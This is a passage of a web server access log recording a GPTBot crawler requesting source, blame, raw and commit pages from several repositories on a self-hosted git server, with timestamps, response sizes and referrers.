GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:15:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:15:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11089] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:15:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:15:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 15699] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" -[17/Feb/2026:15:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12219] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13339] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" -[17/Feb/2026:15:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 15992] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:15:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20374] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:15:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20376] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:15:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" -[17/Feb/2026:15:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14917] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" -[17/Feb/2026:15:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14888] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" -[17/Feb/2026:15:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" -[17/Feb/2026:15:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 14260] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:15:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:15:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" -[17/Feb/2026:15:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" -[17/Feb/2026:15:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14921] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" -[17/Feb/2026:15:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43156] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43159] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 12821] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" -[17/Feb/2026:15:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode" [Client 74.7.227.38] [Length 9783] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" -[17/Feb/2026:15:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10462] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10437] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15614] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" -[17/Feb/2026:15:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15612] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" -[17/Feb/2026:15:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11624] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" -[17/Feb/2026:15:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages" [Client 74.7.227.38] [Length 23999] [Gzip 4.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:15:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10219] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10219] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 12097] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" -[17/Feb/2026:15:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:15:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10944] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:15:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16081] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16083] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2ffetcher.py.claude" [Client 74.7.227.38] [Length 28690] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:15:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpython" [Client 74.7.227.38] [Length 23591] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" 